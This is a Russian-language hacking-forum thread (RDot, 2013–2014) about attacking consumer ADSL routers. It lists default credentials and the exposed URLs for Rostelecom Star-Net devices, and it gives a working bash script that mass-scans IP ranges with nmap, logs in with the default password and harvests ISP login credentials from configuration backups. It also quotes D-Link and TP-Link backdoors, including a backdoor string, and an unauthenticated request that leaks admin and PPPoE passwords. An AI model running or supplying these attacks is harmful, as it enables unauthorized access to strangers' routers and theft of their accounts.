Вернуться   RDot > Аспекты НСД > Web-среда/Web-applications

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 22.01.2013, 17:49   #21
n\a
 
Регистрация: 02.12.2011
Сообщений: 2
Репутация: 3
По умолчанию

Ростелеком
Роутеры Star-Net всех серий, в том числе и особо популярные:
Код:
Device Model		AR800
Hardware Version	V1.5
Software Version	1.2.8
Код:
Device Model		96328A600
Hardware Version	V1.0
Software Version	1.2.8
Дефолтный пасс на веб морду:
Код:
support:support
Логин и пароль на WAN:
Код:
http://IP/netcfgatm.html
Если поля PPP Username и PPP Password пустые, переходим на
http://IP/wancfg.cmd?action=viewone
Заглядывает в код, ищем
pppUserName.value = 'LOGIN';
pppPassword.value = 'PASSWORD';
Пасс на вафлю:
Код:
http://IP/wlsecurity.html
Заглядываем в код, ищем
var wpaPskKey = 'PASSWORD';
Конфиг:
Код:
http://IP/backupsettings.conf
PS: Увидели wi-fi сеть с SSIDом WIFI_WLAN пасс к ней star-net
Добра всем!

Последний раз редактировалось n\a; 22.01.2013 в 17:53..
n\a вне форума   Ответить с цитированием
Старый 24.01.2013, 11:39   #22
n\a
 
Регистрация: 02.12.2011
Сообщений: 2
Репутация: 3
По умолчанию

Накидал вам добра, для автоматизации процесса выдерания учетных данных с роутеров star-net.
Кратко, что делает скриптец:
По средствам nmap ищем 80 открытый порт, если находим влетаем на роутер, авторизуемся, ищем конфиг, сливаем, локально грепаем строки <Username> и <Password> отрезаем не нужное(повторы строк <Username>(null)</Username>), выводим Логин и Пароль, удаляем временные файлы, прощаемся. Вот в принципе и всё.
Запуск: ./name_script.sh IP-255 или ./name_script.sh IP/mask кому как нравится.
Код:
#!/bin/bash
#
# Star-Net ADSL account grabber
# Специально для rdot.org
# Всем добра и танца!

IPRANGE="$1"
REPORT="/tmp/scanlist"
CONF="/tmp/wan"

nmap -n -sT -PN -p 80 --open -oG "$REPORT" "$IPRANGE" > /dev/null 2>&1 && {
    IPLIST="$(cat $REPORT | grep '80/open' | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')"
    for IP in $IPLIST ; do
        [[ $(wget -q -S -T 2 -t 1 "http://$IP" 2>&1 | grep -ic 'ADSL2+') -gt 0 ]] && 
		{
            [[ $(wget -q -S -T 2 -t 1 --http-user=support --http-password=support -O $CONF "http://$IP/backupsettings.conf" 2>&1 | grep -ic '200 OK') -gt 0 ]] &&
			{
                USERNAME=$(cat $CONF | grep -o '<Username>.*</Username>' | grep -v '<Username>(null)</Username>')
                PASSWORD=$(cat $CONF | grep -o '<Password>.*</Password>' | grep -v '<Password>(null)</Password>')
                echo "$IP $USERNAME$PASSWORD"
            }
        }
    done
}
rm -f $CONF
rm -f $REPORT
exit 0

Последний раз редактировалось n\a; 24.01.2013 в 11:46..
n\a вне форума   Ответить с цитированием
Старый 13.03.2013, 11:18   #23
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

TP-Link TL-WDR4300 http/tftp backdoor - remote pwnage

http://habrahabr.ru/post/183314/: D-Link (DIR-300revA, DIR-300revB, DIR-600revB) telnet backdoor.

Последний раз редактировалось SynQ; 21.06.2013 в 15:08..
SynQ вне форума   Ответить с цитированием
Старый 13.10.2013, 02:07   #24
c411k
 
Регистрация: 17.07.2010
Сообщений: 27
Репутация: 29
По умолчанию

еще один бэкдорчик в D-Link'e

http://www.devttys0.com/2013/10/reve...link-backdoor/
http://habrahabr.ru/post/197314/

2010 год
http://forum.codenet.ru/q58748/%D0%B...#answer_311624

xmlset_roodkcableoj28840ybtide
editby04882joelbackdoor, ищем 04882joel ? :]

Последний раз редактировалось c411k; 13.10.2013 в 19:18..
c411k вне форума   Ответить с цитированием
Старый 10.01.2014, 23:30   #25
VirusVFV
 
Регистрация: 10.01.2014
Сообщений: 11
Репутация: 0
По умолчанию

Недавно нарыл вот такую штуку:
DIR-100 HW Rev. D1 SW ver.4.03
http://X.X.X.X/cliget.cgi?cmd=$sys_user1%;$poe_user%;$poe_pass%;
в ответ:
user=admin&pass=xxxxxxx poeuser poepassword

авторизация не нужна.
Формально это еще и os command injection...

Если не затруднит - проверьте на других версиях SW ver. (у меня под рукой только 4.03).
VirusVFV вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot